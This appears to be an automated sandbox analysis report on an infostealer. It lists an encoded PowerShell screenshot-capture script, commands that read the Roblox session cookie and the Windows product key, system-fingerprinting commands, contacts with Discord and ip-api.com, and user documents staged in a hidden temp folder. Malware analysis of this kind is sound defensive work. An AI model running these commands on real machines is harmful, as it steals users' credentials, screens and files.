powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2C5.tmp" "c:\Users\Admin\AppData\Local\Temp\a2jynxmq\CSC8D266908130C4AF3AB83E14A3C2276F.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.35:443 gstatic.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 101.11.19.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI42842\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

C:\Users\Admin\AppData\Local\Temp\_MEI42842\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

C:\Users\Admin\AppData\Local\Temp\_MEI42842\base_library.zip

MD5 1a9c629de02e85430c59891b19e1edee
SHA1 dd19bc5e5705ef60f32d7ca6784398aae893937a
SHA256 a980622370dabfe680de4b68bdd7f626978b5fa7337392c96b107e21bc8f43dd
SHA512 e9bec6d257a47d48db7143f9d1fa815f274595f5d50c0a9bb512d336c6aef8d6e8cbfc9a4ef0954d38e26c36ebb8db660c2dfcec5881e7a42a0fc7ad2adf94b1

C:\Users\Admin\AppData\Local\Temp\_MEI42842\python3.DLL

MD5 fd4a39e7c1f7f07cf635145a2af0dc3a
SHA1 05292ba14acc978bb195818499a294028ab644bd
SHA256 dc909eb798a23ba8ee9f8e3f307d97755bc0d2dc0cb342cedae81fbbad32a8a9
SHA512 37d3218bc767c44e8197555d3fa18d5aad43a536cfe24ac17bf8a3084fb70bd4763ccfd16d2df405538b657f720871e0cd312dfeb7f592f3aac34d9d00d5a643

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_ctypes.pyd

MD5 1635a0c5a72df5ae64072cbb0065aebe
SHA1 c975865208b3369e71e3464bbcc87b65718b2b1f
SHA256 1ea3dd3df393fa9b27bf6595be4ac859064cd8ef9908a12378a6021bba1cb177
SHA512 6e34346ea8a0aacc29ccd480035da66e280830a7f3d220fd2f12d4cfa3e1c03955d58c0b95c2674aea698a36a1b674325d3588483505874c2ce018135320ff99

C:\Users\Admin\AppData\Local\Temp\_MEI42842\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_ssl.pyd

MD5 7910fb2af40e81bee211182cffec0a06
SHA1 251482ed44840b3c75426dd8e3280059d2ca06c6
SHA256 d2a7999e234e33828888ad455baa6ab101d90323579abc1095b8c42f0f723b6f
SHA512 bfe6506feb27a592fe9cf1db7d567d0d07f148ef1a2c969f1e4f7f29740c6bb8ccf946131e65fe5aa8ede371686c272b0860bd4c0c223195aaa1a44f59301b27

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_sqlite3.pyd

MD5 5279d497eee4cf269d7b4059c72b14c2
SHA1 aff2f5de807ae03e599979a1a5c605fc4bad986e
SHA256 b298a44af162be7107fd187f04b63fb3827f1374594e22910ec38829da7a12dc
SHA512 20726fc5b46a6d07a3e58cdf1bed821db57ce2d9f5bee8cfd59fce779c8d5c4b517d3eb70cd2a0505e48e465d628a674d18030a909f5b73188d07cc80dcda925

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_socket.pyd

MD5 819166054fec07efcd1062f13c2147ee
SHA1 93868ebcd6e013fda9cd96d8065a1d70a66a2a26
SHA256 e6deb751039cd5424a139708475ce83f9c042d43e650765a716cb4a924b07e4f
SHA512 da3a440c94cb99b8af7d2bc8f8f0631ae9c112bd04badf200edbf7ea0c48d012843b4a9fb9f1e6d3a9674fd3d4eb6f0fa78fd1121fad1f01f3b981028538b666

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_queue.pyd

MD5 d8c1b81bbc125b6ad1f48a172181336e
SHA1 3ff1d8dcec04ce16e97e12263b9233fbf982340c
SHA256 925f05255f4aae0997dc4ec94d900fd15950fd840685d5b8aa755427c7422b14
SHA512 ccc9f0d3aca66729832f26be12f8e7021834bbee1f4a45da9451b1aa5c2e63126c0031d223af57cf71fad2c85860782a56d78d8339b35720194df139076e0772

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_lzma.pyd

MD5 7447efd8d71e8a1929be0fac722b42dc
SHA1 6080c1b84c2dcbf03dcc2d95306615ff5fce49a6
SHA256 60793c8592193cfbd00fd3e5263be4315d650ba4f9e4fda9c45a10642fd998be
SHA512 c6295d45ed6c4f7534c1a38d47ddc55fea8b9f62bbdc0743e4d22e8ad0484984f8ab077b73e683d0a92d11bf6588a1ae395456cfa57da94bb2a6c4a1b07984de

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_hashlib.pyd

MD5 d4674750c732f0db4c4dd6a83a9124fe
SHA1 fd8d76817abc847bb8359a7c268acada9d26bfd5
SHA256 caa4d2f8795e9a55e128409cc016e2cc5c694cb026d7058fc561e4dd131ed1c9
SHA512 97d57cfb80dd9dd822f2f30f836e13a52f771ee8485bc0fd29236882970f6bfbdfaac3f2e333bba5c25c20255e8c0f5ad82d8bc8a6b6e2f7a07ea94a9149c81e

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_decimal.pyd

MD5 20c77203ddf9ff2ff96d6d11dea2edcf
SHA1 0d660b8d1161e72c993c6e2ab0292a409f6379a5
SHA256 9aac010a424c757c434c460c3c0a6515d7720966ab64bad667539282a17b4133
SHA512 2b24346ece2cbd1e9472a0e70768a8b4a5d2c12b3d83934f22ebdc9392d9023dcb44d2322ada9edbe2eb0e2c01b5742d2a83fa57ca23054080909ec6eb7cf3ca

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_bz2.pyd

MD5 86d1b2a9070cd7d52124126a357ff067
SHA1 18e30446fe51ced706f62c3544a8c8fdc08de503
SHA256 62173a8fadd4bf4dd71ab89ea718754aa31620244372f0c5bbbae102e641a60e
SHA512 7db4b7e0c518a02ae901f4b24e3860122acc67e38e73f98f993fe99eb20bb3aa539db1ed40e63d6021861b54f34a5f5a364907ffd7da182adea68bbdd5c2b535

C:\Users\Admin\AppData\Local\Temp\_MEI42842\unicodedata.pyd

MD5 81d62ad36cbddb4e57a91018f3c0816e
SHA1 fe4a4fc35df240b50db22b35824e4826059a807b
SHA256 1fb2d66c056f69e8bbdd8c6c910e72697874dae680264f8fb4b4df19af98aa2e
SHA512 7d15d741378e671591356dfaad4e1e03d3f5456cbdf87579b61d02a4a52ab9b6ecbffad3274cede8c876ea19eaeb8ba4372ad5986744d430a29f50b9caffb75d

C:\Users\Admin\AppData\Local\Temp\_MEI42842\sqlite3.dll

MD5 914925249a488bd62d16455d156bd30d
SHA1 7e66ba53f3512f81c9014d322fcb7dd895f62c55
SHA256 fbd8832b5bc7e5c9adcf7320c051a67ee1c33fd198105283058533d132785ab4
SHA512 21a468929b15b76b313b32be65cfc50cad8f03c3b2e9bf11ca3b02c88a0482b7bc15646ce40df7fb42fbc96bd12362a54cffe0563c4ddc3fc78622622c699186

C:\Users\Admin\AppData\Local\Temp\_MEI42842\select.pyd

MD5 a653f35d05d2f6debc5d34daddd3dfa1
SHA1 1a2ceec28ea44388f412420425665c3781af2435
SHA256 db85f2f94d4994283e1055057372594538ae11020389d966e45607413851d9e9
SHA512 5aede99c3be25b1a962261b183ae7a7fb92cb0cb866065dc9cd7bb5ff6f41cc8813d2cc9de54670a27b3ad07a33b833eaa95a5b46dad7763ca97dfa0c1ce54c9

C:\Users\Admin\AppData\Local\Temp\_MEI42842\libssl-1_1.dll

MD5 bec0f86f9da765e2a02c9237259a7898
SHA1 3caa604c3fff88e71f489977e4293a488fb5671c
SHA256 d74ce01319ae6f54483a19375524aa39d9f5fd91f06cf7df238ca25e043130fd
SHA512 ffbc4e5ffdb49704e7aa6d74533e5af76bbe5db297713d8e59bd296143fe5f145fbb616b343eed3c48eceaccccc2431630470d8975a4a17c37eafcc12edd19f4

C:\Users\Admin\AppData\Local\Temp\_MEI42842\libcrypto-1_1.dll

MD5 9d7a0c99256c50afd5b0560ba2548930
SHA1 76bd9f13597a46f5283aa35c30b53c21976d0824
SHA256 9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939
SHA512 cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2

C:\Users\Admin\AppData\Local\Temp\_MEI42842\zstandard\backend_c.cp310-win_amd64.pyd

MD5 ee146c36c6f83a972594c2621e34212d
SHA1 71f41b8f4b779060fc96de58122e6c184cbe259c
SHA256 4378881d850bc5796f2d66f7689e7966915b11dfd9130449137fbcb61c296b84
SHA512 2964939a0091ffd3b0ec85afab65d6b447af8fc09e39d9f655f1fb0edaaa52b9b5cb8258b4621b787e787b9b1eccc53335ca83090be7d4739d77340dc31e46b1

memory/404-61-0x000001D5363A0000-0x000001D5363C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ksem1pey.o2m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 440cb38dbee06645cc8b74d51f6e5f71
SHA1 d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA256 8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA512 3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

\??\c:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.cmdline

MD5 46809abb53a97dd388010de2f9437ffd
SHA1 e8aa10ec98b16323799a9dce6312995cfc3b32fb
SHA256 46cf549b22b629656fe1dcca1da959e297823460d1ea5c1cbb3c1d6efd99a033
SHA512 075b67f01f63569886e3751d414b0a7212b1374052a290810537adff40c8a6cdc73f3e8fe48c79fe4e595033e11cbda7bb96b31ba29ff33308b5cc2a92b5dc37

\??\c:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\a2jynxmq\CSC8D266908130C4AF3AB83E14A3C2276F.TMP

MD5 87fce8285a7e0b702df0410c3495c2a5
SHA1 103bdae566990618814a6e38dde6849f126a8d47
SHA256 01bcf141881bb337af25f5e0076d6f0c5089fe90e1ee4f6cc66368bc9a5accfc
SHA512 48c5be35698d72d37ffc74376047a61dd9ae57fffbd57dfd621c3c446ca1c1f517cbab4c18858b1d4c6628122eead8e7a3a81d53d3c43880ca3d24765f63ea0b

C:\Users\Admin\AppData\Local\Temp\RESB2C5.tmp

MD5 550c961ae6ea7415a59a812b08476e99
SHA1 e74573ea16b8a03f4d915f6eb981438703323ed5
SHA256 c0119561ec2f72d44dfc62f98d5ba6405570edd711b8af599f9bef8f1a34499c
SHA512 0d851cbf67b56acafdace1df9f138642a5e1c1e84fc15c4b1a4bc02b810077bc264dd71661477590b5783e34ebea2a82870aa228fe446b4a46ea32b4779c90ad

C:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.dll

MD5 44c940f74558c0a701a7705b3289398f
SHA1 583fe9736924ea5051d9e7a7b22b1c1fde1b0ed7
SHA256 8ce031c402174e4c1e5862c8a82b3877c1f4737038b171cc4cd4b1861522e36b
SHA512 e980de9f3966947525c6d31cd75470410050bf465238d3da518115c11d893037f4a9e98fcdce2e066c33b40876dd06572c4fb7d103b86e65ab8b23677fade2d2

memory/2968-151-0x000001E1AF590000-0x000001E1AF598000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5da75924b097c993fdadd6105ac95afc
SHA1 adf57bf4e8b25c3b0f6d10824940aca90b4c2d5b
SHA256 624e2e7b83ef7f854b40994fab63efa8ec7f08eee2b3b81eb21e3b421268456d
SHA512 6eb235628cac4e4dbf60eae0bd398f9514f1ece8643f91cc73dc54e6b864ebe1f1f211954debb6c3e3c7810a4353152dd3a2563f6b4baeb8ede5bd04f4032f58

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Display (1).png

MD5 51c0addede33615f49a485505785631b
SHA1 3fecda0faa2f48c5e6bd174c60965a71ee1c8e3a
SHA256 7b64f86d9e390a20ec9d0ac38e635500acddb82384bfaa42157d7ecc1f34eadb
SHA512 d95f3b0dc688907bfef64c20f1db88b7d070216ab0b4eb47e11d438f3c0f7255f1e18960da2fed3668efcdb56033a79253e092c45ada153e1a12816e13ed196c

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\RemoveRepair.docx

MD5 a37761f3323ede2be68b891fc8b8d587
SHA1 d1d2ff4542d6f20862577c4778826d5c5f2f3193
SHA256 68a6fef33acdd03945bc6a4fc1d1e16c6ad52e918e9a2973fc94c39c8a1478b2
SHA512 ac41a0df27243ae93cbb285ebd6d63f2a65938b61114bd3d06a8aac0e01473cbedabd877ebe3b35b61ddc0e25ccc40956988b6fb1939ecbaf5034ebd751786c9

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\SetLock.pdf

MD5 4c23bc65a7e4d48502a3bddf757be6c0
SHA1 5d7534383a1e953fff1ec90cd73b69e46173f63b
SHA256 9f5779bdd4cf03fcf0ad6be18173b5a524d3e52f25a2aadfa04d18166160bded
SHA512 d33830716bacfd84f14016f3f244c35f1c2bd848401aa936be0af7ad23589610ccd31c0c9eea2a2d3523efd3ca91a88b0bb9072056236e787ee6e297c5ecf141

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\ReadImport.docx

MD5 81ed5749ac7af8e1e628dda50d8754de
SHA1 acfb6ff1c571eaf2aedd6f15eb41b9c7750facd9
SHA256 2ac9d102efd0b633f0045d809ea3950ff742be3d490bc11aab6966ac6b2e80de
SHA512 10c6cfe06b8593b46c8c9202cf5166bfeecb3d17844ec99fe7a8a027e160cb8714743ccc0e9901a08496f336755b69e16cc400643fc43a6629ffc4587125b066

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\JoinResume.docx

MD5 a606e64e8edaf5878364b98247c2747d
SHA1 0f98505f8dd49a9bd1f663579e4c4eaab231c3fe
SHA256 87993367d0646fcf117a1d16585af1072016f232fae91cdd0324a06a768eb1e3
SHA512 23df5ff570c73e3310dcfcbf2daa0bbcacdafb8b53e11c2b1f71559fe2d4a4b1f22fe49b8c0842e4cd09de9eaae5c84a92d3e450d0d20b28bd01cb521ec48e46

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\CompressOptimize.xlsx

MD5 13c6517d392f8343341210563d268f6c
SHA1 41534a74b52da729673386ebf7e8d028be2f70a4
SHA256 1cd0a28a4cd52625724e52d5b8368ff4ca628dd73cfe003bf5e61ce0d2191067
SHA512 270a40ba901356008b63966631f1a88c4a74fb547a4e397b88ccf416038a14c1aef4fba0f24c42bce02eaadd7a3bcec6fc0331490cec78e16d8e726283b33d54

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\BackupEnable.vssx

MD5 7769827ea4e3d07a6451208748fa6cfa
SHA1 15104cba6da41567d0a7a7b0e662ce96be58642e
SHA256 373816d024a1998551afbc6074f5e1f573db86e606f7e7bd57dd268e7fe0b071
SHA512 ef9dbc1ca43d21c071bd38a1192edf19822f2d4cd58301e5b8b9d334535f8cc7a5840fdc3ef8632e2ae05253a9152171a3fc29ef7c821a14fda185888883fec7

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\TestCheckpoint.xlsx

